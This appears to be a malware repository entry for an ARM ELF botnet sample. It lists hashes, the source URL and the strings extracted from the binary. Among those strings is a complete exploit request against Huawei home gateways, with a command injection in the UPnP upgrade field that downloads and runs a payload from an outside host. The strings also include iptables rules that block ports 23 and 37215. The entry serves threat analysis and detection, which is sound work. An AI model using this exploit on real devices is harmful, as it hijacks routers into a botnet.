Sample details: 709cf51291a6bfffcfc221e27c5c7d59

Hashes
MD5: 709cf51291a6bfffcfc221e27c5c7d59
SHA1: adbbeed0d9f11697073fd9fd6416094e18866976
SHA256: 316f3283386a76374c235792c51ddbf3a94bdfb5e4b4c8b8538d37ea606b137d
SSDEEP: 1536:lg2537uPcEpoK3rmodPNRCeaem5Vt/kL:lgO371K1/dlm5V2
Details
File Type: ELF
Yara Hits
Source (URL the sample was retrieved from)
http://185.62.190.159/bins/arm5.idopoc
Strings (printable strings extracted from the ELF sample)
/lib/ld-uClibc.so.0
libc.so.0
strcpy
connect
sigemptyset
memmove
getpid
memcpy
readlink
system
malloc
__udivsi3
recvfrom
socket
select
readdir
sigaddset
accept
calloc
__umodsi3
inet_addr
setsockopt
signal
sendto
realloc
listen
__aeabi_ldiv0
__uClibc_main
memset
__div0
__aeabi_uidiv
getppid
opendir
getsockopt
__aeabi_uidivmod
__errno_location
__modsi3
__aeabi_idiv0
__data_start
setsid
closedir
sigprocmask
getsockname
_edata
__bss_start
__bss_start__
__bss_end__
__end__
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g okay.gorillamc.party -l /tmp/ifipoc -r /bins/mips.idopoc; /bin/busybox chmod 777 * /tmp/ifipoc; /tmp/ifipoc huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
iptables -A INPUT -p tcp --destination-port 23 -j DROP
iptables -A INPUT -p tcp --destination-port 37215 -j DROP
*+)#0+XB
M$65&6SRS=
M$65&6SRS>B
B*+)#0+b
SPQVWT
.shstrtab
.interp
.dynsym
.dynstr
.rel.plt
.rodata
.ctors
.dtors
.dynamic